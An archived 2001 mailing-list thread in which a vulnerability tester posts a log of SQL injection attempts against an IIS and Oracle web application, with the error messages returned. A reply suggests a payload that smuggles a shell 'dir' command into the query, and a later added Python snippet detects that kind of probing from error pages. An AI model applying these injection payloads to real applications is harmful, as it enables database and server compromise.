Hm ... I would try:

Input: „select * from ' & shell („Dir c:\“) & ' sys.tab$“

this will hopefully give you a dir of c:\

Best regards
Der Schakal

>>>>>>>>>>>>>>>>>> Original Message <<<<<<<<<<<<<<<<<<

On 10.12.2001, 17:06:05, "foo bar" <badb0tat_private> wrote on the subject
SQL INJECTION - ORACLE:

> Hello
>
> I am performing a vulnerability test against a web application and would
> like some advice. The application is running IIS 4.0 - all the remote
> exploits are patched. The backend is just a bunch of VB scripts, getting
> info from an oracle8 server on AIX.
>
> Most of the places where input is accepted must strip out unexpected
> characters, but I located one field on a form where input was not properly
> validated. I've tried posting different strings into the field with limited
> success. All I'm able to get is errors back. I'd like to take advantage of
> some stored procedures in oracle. Could you look at the log of my activity
> below and provide advice on where to go next in order to compromise the
> database, or the server itself? I'd even be happy with the ability to run a
> successful query through injection. It looks like they're using a package or
> stored procedure to post the query, and I'm having trouble breaking out of
> it. Is it possible, if so, how should I go about it?
>
> Input: '
> Result:
> Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
> [Microsoft][ODBC driver for Oracle][Oracle]ORA-00907: missing right
> parenthesis
> E:\INETPUB\WEBSITE\CLAIM ENTRY\../systemmonitor/AdoRecordCount.asp, line 128
>
> Input: ')
> Result:
> Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
> [Microsoft][ODBC driver for Oracle][Oracle]ORA-00923: FROM keyword not found
> where expected
> E:\INETPUB\WEBSITE\CLAIM ENTRY\../systemmonitor/AdoRecordCount.asp, line 128
>
> Input: ') from
> Result:
> Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
> [Microsoft][ODBC driver for Oracle][Oracle]ORA-00903: invalid table name
> E:\INETPUB\WEBSITE\CLAIM ENTRY\../systemmonitor/AdoRecordCount.asp, line 128
>
> Input: ') from policy
> Result:
> Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
> [Microsoft][ODBC driver for Oracle][Oracle]ORA-00933: SQL command not
> properly ended
> E:\INETPUB\WEBSITE\CLAIM ENTRY\../systemmonitor/AdoRecordCount.asp, line 128
>
> Input: ') from policy -- "'"
> Result:
> Microsoft OLE DB Provider for ODBC Drivers error '80004005'
> [Microsoft][ODBC driver for Oracle][Oracle]ORA-06553: PLS-306: wrong number
> or types of arguments in call to 'GETPOLICYNUMBER'
> E:\INETPUB\WEBSITE\CLAIM ENTRY\../systemmonitor/AdoRecordCount.asp, line 128
>
> Input: ') from getpolicynumber -- "'"
> Result:
> Microsoft OLE DB Provider for ODBC Drivers error '80004005'
> [Microsoft][ODBC driver for Oracle][Oracle]ORA-04044: procedure, function,
> package, or type is not allowed here
> E:\INETPUB\WEBSITE\CLAIM ENTRY\../systemmonitor/AdoRecordCount.asp, line 128
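A detection-side view of the quoted log, as an added example that is not part of the original thread: it scans web responses for the Oracle parse errors and the script path that the error pages above disclose, and flags a client that triggers several distinct parse errors. The function names, the threshold, the client addresses and the sample records are assumptions constructed from the error text in the quoted log.

```python
import re
from collections import defaultdict

# Oracle parse-time errors seen in the quoted log; each one means user input
# reached the SQL parser as syntax rather than as a bound value.
PARSE_ERRORS = {"ORA-00907", "ORA-00923", "ORA-00903", "ORA-00933",
                "ORA-06553", "ORA-04044"}
ORA_RE = re.compile(r"\bORA-\d{5}\b")
# Server-side script path and line number disclosed by the ASP error page.
PATH_RE = re.compile(r"[A-Za-z]:\\[^\r\n,]+\.asp, line \d+")
MIN_DISTINCT = 3  # assumed threshold: distinct parse errors per client


def inspect_response(body):
    """Return (parse-error codes, leaked script paths) found in one response."""
    codes = set(ORA_RE.findall(body)) & PARSE_ERRORS
    return codes, PATH_RE.findall(body)


def find_probing_clients(records):
    """records: iterable of (client_ip, response_body) -> {ip: sorted codes}."""
    seen = defaultdict(set)
    for ip, body in records:
        codes, _ = inspect_response(body)
        seen[ip] |= codes
    return {ip: sorted(c) for ip, c in seen.items() if len(c) >= MIN_DISTINCT}


# Constructed sample data: error text from the quoted log, documentation IPs.
PAGE = r"E:\INETPUB\WEBSITE\CLAIM ENTRY\../systemmonitor/AdoRecordCount.asp, line 128"


def _err(code, text):
    return ("Microsoft OLE DB Provider for ODBC Drivers error '80040e14'\n"
            "[Microsoft][ODBC driver for Oracle][Oracle]%s: %s\n%s"
            % (code, text, PAGE))


SAMPLE = [
    ("192.0.2.10", _err("ORA-00907", "missing right parenthesis")),
    ("192.0.2.10", _err("ORA-00923", "FROM keyword not found where expected")),
    ("192.0.2.10", _err("ORA-00903", "invalid table name")),
    ("198.51.100.7", _err("ORA-00907", "missing right parenthesis")),
    ("198.51.100.7", "<html>Claim saved.</html>"),
]

if __name__ == "__main__":
    print(find_probing_clients(SAMPLE))
```

A single parse error can come from an ordinary typing mistake; the run of different parse errors from one client against the same page is the stronger signal, and any hit on the path pattern means detailed error pages are being returned to users.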
This archive was generated by hypermail 2b30 : Mon Dec 10 2001 - 13:11:30 PST